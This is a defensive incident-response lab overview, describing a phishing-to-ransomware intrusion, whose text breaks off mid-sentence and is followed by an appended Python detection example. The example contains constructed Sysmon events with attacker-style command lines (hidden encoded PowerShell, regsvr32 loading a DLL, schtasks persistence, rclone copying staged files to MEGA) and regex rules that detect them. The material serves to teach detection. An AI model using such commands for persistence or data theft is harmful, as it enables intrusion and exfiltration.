This lab presents a comprehensive investigation into a sophisticated cyberattack involving initial compromise through phishing, lateral movement, data exfiltration, and ransomware deployment. The attacker began by leveraging a malicious Excel document that initiated a PowerShell command to drop and execute a VBScript file. From there, the adversary escalated their activities by deploying various tools, including regsvr32.exe running a malicious DLL and schtasks.exe to establish persistence via scheduled tasks. Further persistence was achieved through registry modifications and the use of obfuscated PowerShell commands.

As the attack unfolded, the adversary downloaded and used several dual-use and administrative tools such as netscan.exe for internal network reconnaissance, PsExec64.exe for lateral movement, and bitsadmin and curl for file transfers. Once the attacker had achieved a foothold on the domain controller, a privileged domain account was used to conduct data staging. Sensitive files were compressed using PowerShell’s Compress-Archive cmdlet and later exfiltrated using the rclone tool, which uploaded the data to the MEGA cloud storage platform. Following exfiltration, a custom ransomware binary was executed to encrypt files, appending a unique extension and dropping ransom notes.

Throughout this lab, the defender is challenged to uncover each stage of the attack by analyzing Sysmon, Windows event logs, PowerShell command history, and file system activity. By tracing the attacker’s steps—from initial access to data exfiltration and impact
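The following is an added example, not part of the lab materials: a small set of detection rules for the stages described above (Office spawning a script host, encoded PowerShell, regsvr32 loading a DLL, schtasks persistence, rclone to MEGA) run over constructed Sysmon Event ID 1 records. The sample events, paths and command lines are made up for illustration; the field names mirror Sysmon's ProcessCreate event.

```python
# Added detection example: checks constructed Sysmon Event ID 1 (process
# creation) records for the stages this lab describes.  Field names follow
# Sysmon's ProcessCreate event; the records themselves are made up.
import re

# Constructed sample events (not telemetry from the lab).
EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": "powershell.exe -w hidden -enc AAAAAAAAAAAA"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"regsvr32.exe /s C:\Users\Public\update.dll"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"schtasks /create /sc minute /mo 5 /tn Updater /tr C:\Users\Public\run.vbs"},
    {"Image": r"C:\Tools\rclone.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"rclone.exe copy C:\Staging\docs.zip mega:backup -q"},
    {"Image": r"C:\Windows\System32\notepad.exe",   # benign control event
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

OFFICE = ("winword.exe", "excel.exe", "powerpnt.exe")
SCRIPT_HOSTS = ("powershell.exe", "wscript.exe", "cscript.exe", "cmd.exe")

def base(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

# (rule name, predicate over one event); each rule maps to a stage of the lab.
RULES = [
    ("office_spawns_script_host", lambda e: base(e["ParentImage"]) in OFFICE
     and base(e["Image"]) in SCRIPT_HOSTS),
    ("encoded_powershell", lambda e: base(e["Image"]) == "powershell.exe"
     and re.search(r"(?i)\s-(e|ec|enc|encodedcommand)\b", e["CommandLine"])),
    ("regsvr32_loads_dll", lambda e: base(e["Image"]) == "regsvr32.exe"
     and re.search(r"(?i)\.dll\b", e["CommandLine"])),
    ("schtasks_create_script", lambda e: base(e["Image"]) == "schtasks.exe"
     and re.search(r"(?i)/create\b.*\.(vbs|js|ps1|bat)\b", e["CommandLine"])),
    ("rclone_to_mega", lambda e: base(e["Image"]) == "rclone.exe"
     and re.search(r"(?i)\bmega:", e["CommandLine"])),
]

def detect(events):
    """Return (rule name, image name) for every rule that fires on each event."""
    return [(name, base(e["Image"])) for e in events for name, pred in RULES if pred(e)]
```

Each rule corresponds to one stage of the intrusion; in practice the same predicates would be applied to parsed Sysmon XML or forwarded event records rather than the inline dictionaries used here.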